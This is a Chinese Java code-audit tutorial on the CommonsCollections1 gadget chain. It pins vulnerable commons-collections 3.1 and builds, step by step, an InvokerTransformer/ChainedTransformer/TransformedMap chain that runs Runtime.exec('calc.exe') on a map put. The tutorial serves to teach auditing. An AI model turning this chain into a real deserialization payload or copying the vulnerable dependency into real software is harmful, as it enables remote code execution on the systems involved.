Java 代码审计之 CommonsCollections1
1. 环境配置
创建 Maven 项目,Java 版本为 8u20。
<dependencies>
<!-- Lab dependency only: 3.1 is pinned on purpose because it still allows the functor behaviour studied below.
     Do not carry this version into a real build; from 3.2.2 onward, deserialization of the unsafe functor
     classes (InvokerTransformer among them) is disabled by default. -->
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.1</version>
</dependency>
<dependency>
2. CC链介绍
一般情况下调用本地计算器的java代码如下所示:
/** Baseline listing: starts the local calculator with a plain method call, no reflection involved. */
public class Test {
    public static void main(String[] args) throws Exception {
        // "calc" is the harmless marker command that the rest of the article reaches indirectly.
        final String command = "calc";
        final Runtime runtime = Runtime.getRuntime();
        runtime.exec(command);
    }
}
2.1 InvokerTransformer.java介绍
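下面是 InvokerTransformer.java 的关键代码。构造函数 InvokerTransformer 接收三个参数:方法名称、该方法的参数类型数组,以及调用时传入的实参数组。实例化之后可以调用 transform(input):先通过 input.getClass() 取得 input 的 Class 对象(作用类似于用 Class.forName() 得到 Class 对象),再用 getMethod 按方法名和参数类型获取方法,最后用 invoke 在 input 上执行该方法并返回执行结果。由于方法名和参数都取自对象自身的字段,transform 实际上是一个不加限制的反射调用入口,这也是审计时需要重点关注它的原因。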
/**
 * Records which method {@code transform} will later call reflectively.
 *
 * The three arguments are stored in the instance fields exactly as passed in; no copy is made and no
 * check is applied to the method name or the argument values in this constructor.
 *
 * @param methodName name of the method to look up on the input object
 * @param paramTypes parameter types used to select the method overload
 * @param args       argument values handed to the method when it is invoked
 */
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    super();
    iMethodName = methodName;
    iParamTypes = paramTypes;
    iArgs = args;
}
/**
 * Reflectively calls the configured method on {@code input} and returns whatever that call returns.
 *
 * The method name, parameter types and arguments are the values stored in the instance fields. Nothing
 * in this method restricts which method may be named, so whoever sets those fields decides what is
 * invoked on the input object. That is the property a reviewer should note here.
 *
 * @param input object to call the method on
 * @return the result of the reflective call, or {@code null} when {@code input} is {@code null}
 * @throws FunctorException if the method does not exist, cannot be accessed, or itself throws
 */
public Object transform(Object input) {
    // A null input is passed through untouched; no lookup or invocation happens.
    if (input == null) {
        return null;
    }
    try {
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes); // look the method up by name and parameter types via reflection
        return method.invoke(input, iArgs);
    } catch (NoSuchMethodException ex) {
        // The original exception is not attached as the cause in this branch.
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
    } catch (IllegalAccessException ex) {
        // The original exception is not attached as the cause in this branch either.
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
    } catch (InvocationTargetException ex) {
        // Only here is the underlying exception kept, as the cause of the FunctorException.
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
    }
}
正常调用计算器的代码:
import java.io.IOException;
/** Reference listing: the direct call that the following listings replace step by step with reflection. */
public class TestCC {
    public static void main(String[] args) throws Exception {
        // Obtain the Runtime instance first, then ask it to start the command.
        Runtime current = Runtime.getRuntime();
        current.exec("calc");
    }
}
使用 InvokerTransformer 调用计算器:Runtime.getRuntime() 返回一个 Runtime 实例对象,把它作为 transform 的输入,由 InvokerTransformer 在该对象上反射执行 exec 方法,并传入参数 "calc"。
import org.apache.commons.collections.functors.InvokerTransformer;
/**
 * Step 1: same effect as the direct call, but {@code exec} is reached through
 * {@code InvokerTransformer.transform} instead of being written out in source.
 */
public class TestCC {
    public static void main(String[] args) throws Exception {
        // Direct form, kept for comparison: Runtime.getRuntime().exec("calc");
        Runtime runtime = Runtime.getRuntime();
        // Equivalent direct call on the instance: runtime.exec("calc")
        // Method name "exec", parameter types {String.class}, arguments {"calc"};
        // transform(runtime) looks that method up on runtime's class and invokes it.
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}
import org.apache.commons.collections.functors.InvokerTransformer;
import java.lang.reflect.Method;
/**
 * Step 2: the Runtime instance is no longer obtained by a direct call but through
 * {@code java.lang.reflect}, starting from {@code Runtime.class}.
 */
public class TestCC {
    public static void main(String[] args) throws Exception {
        Class c = Runtime.class;
        // Look up Runtime.getRuntime(); the null stands for "no parameter types".
        Method getRuntimeMethod = c.getMethod("getRuntime",null);
        // getRuntime is static, so the receiver is null; the second null means "no arguments".
        Runtime runtime = (Runtime) getRuntimeMethod.invoke(null,null);
        // Final call is unchanged from step 1: exec("calc") via InvokerTransformer.
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}
import org.apache.commons.collections.functors.InvokerTransformer;
import java.lang.reflect.Method;
/**
 * Step 3: each reflective call from step 2 is itself expressed as an {@code InvokerTransformer},
 * so the whole sequence consists of {@code transform} calls whose output feeds the next one.
 * The commented lines show the plain reflective statement each transformer replaces.
 */
public class TestCC {
    public static void main(String[] args) throws Exception {
        // Replaced: Class c = Runtime.class;
        // Replaced: Method getRuntimeMethod = c.getMethod("getRuntime",null);
        // Calls getMethod("getRuntime", null) on the Class object Runtime.class.
        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
        // Replaced: Runtime runtime = (Runtime) getRuntimeMethod.invoke(null,null);
        // Calls invoke(null, null) on the Method object obtained above.
        Runtime runtime = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(getRuntimeMethod);
        // Calls exec("calc") on the Runtime instance obtained above.
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}
完整cc链构造
package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;
/**
 * Combines the three InvokerTransformer steps into one ChainedTransformer and attaches it to a map
 * as the value transformer, so that a single {@code put} runs the whole sequence.
 *
 * Nothing in this listing is deserialized: the chain fires only because this code calls {@code put}
 * itself. For a reviewer, the point is that any code path which transforms a map value with an
 * attacker-influenced transformer reaches arbitrary method invocation. In real applications the
 * defence is to keep commons-collections at a release in which these functors can no longer be
 * deserialized, and to restrict which classes the application will deserialize at all.
 */
public class Test {
    public static void main(String[] args) {
        // Build the array of transformers; each element's output is the next element's input.
        Transformer[] transformers = new Transformer[] {
            // Start of the chain: always yields Runtime.class, whatever input it is given.
            new ConstantTransformer(Runtime.class),
            // Calls getMethod("getRuntime", null) on Runtime.class.
            new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", null }),
            // Calls invoke(null, null) on the Method returned by the previous step.
            new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null,null}),
            // Calls exec("calc.exe") on the Runtime instance returned by the previous step.
            new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"})
        };
        // Wrap the transformers array in a ChainedTransformer.
        Transformer transformerChain = new ChainedTransformer(transformers);
        // Plain backing map that will be decorated below.
        Map innerMap = new HashMap();
        // Decorate innerMap: no key transformer (null), transformerChain as the value transformer.
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        // Trigger: put() passes the value through transformerChain; the key and value themselves are arbitrary.
        outerMap.put("test1", "xxxx");
    }
}